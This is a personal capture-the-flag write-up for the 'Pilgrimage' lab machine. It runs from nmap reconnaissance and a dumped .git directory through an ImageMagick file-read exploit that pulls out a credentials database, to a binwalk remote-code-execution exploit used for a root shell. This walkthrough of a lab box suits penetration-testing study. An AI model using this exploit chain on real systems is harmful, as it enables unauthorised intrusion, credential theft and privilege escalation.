Pilgrimage
- Date completed: 2023-06-24
- Difficulty: Easy
- OS: Linux
User flag
Initial nmap:
$ nmap -sC -sV pilgrimage.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 22:52 CDT
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
| 256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
|_ 256 d14e293c708669b4d72cc80b486e9804 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-git:
| 10.10.11.219:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
|_http-title: Pilgrimage - Shrink Your Images
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.20 seconds
Website has an exposed .git directory, so used git-dumper to see what was there.
There was no source code here, but .git/COMMIT_EDITMSG showed that there was a magick file which looked interesting, so that was downloaded from the website.
Ran ./magick -version, it's version 7.1.0-49, which is vulnerable:
$ searchsploit imagemagick 7.1.0
------------------------------------------ --------------------------
Exploit Title | Path
------------------------------------------ --------------------------
ImageMagick 7.1.0-49 - Arbitrary File Rea | multiple/local/51261.txt
ImageMagick 7.1.0-49 - DoS | php/dos/51256.txt
------------------------------------------ --------------------------
Shellcodes: No Results
Got PoC from https://github.com/voidz0r/CVE-2022-44268
$ cargo run "/var/www/pilgrimage.htb/index.php"
Upload file, and then downloaded the resulting file and examine it using the instructions from the PoC.
The source shows that there is a database being accessed, so try getting that:
$ cargo run "/var/db/pilgrimage"
Extracting this file using the instructions didn't result in a sensible file, but converting it to a file using https://unix.stackexchange.com/questions/279505/convert-hexadecimal-to-binary-on-linux-cli resulted in a file that worked:
$ cat hexdata.txt | xxd -r -p > pilgrimage
$ file pilgrimage
pilgrimage: SQLite 3.x database, last written using SQLite version 3034001, file counter 84, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 84
Looking at the database using sqlitebrowser showed that there was a table with a username and password. Then ssh in as emily to get the flag.
Root flag
Root is running /usr/sbin/malwarescan.sh, which is running binwalk every time a file is created in /var/www/pilgrimage.htb/shrunk/. Looking for the version of binwalk shows that it's an older version
$ find / -name *binwalk* 2>/dev/null
/usr/local/lib/python3.9/dist-packages/binwalk-2.3.2.egg-info
/usr/local/lib/python3.9/dist-packages/binwalk
/usr/local/lib/python3.9/dist-packages/binwalk/magic/binwalk
/usr/local/bin/binwalk
/home/emily/.config/binwalk
There is an RCE exploit available for this version
$ searchsploit binwalk 2.3.2
------------------------------------------ --------------------------
Exploit Title | Path
------------------------------------------ --------------------------
Binwalk v2.3.2 - Remote Command Execution | python/remote/51249.py
------------------------------------------ --------------------------
Shellcodes: No Results
This exploit was copied onto the box, and the emily user was used to copy it directly to the directory (the upload won't work because it resizes the image). Then the shell could be caught and the root flag obtained.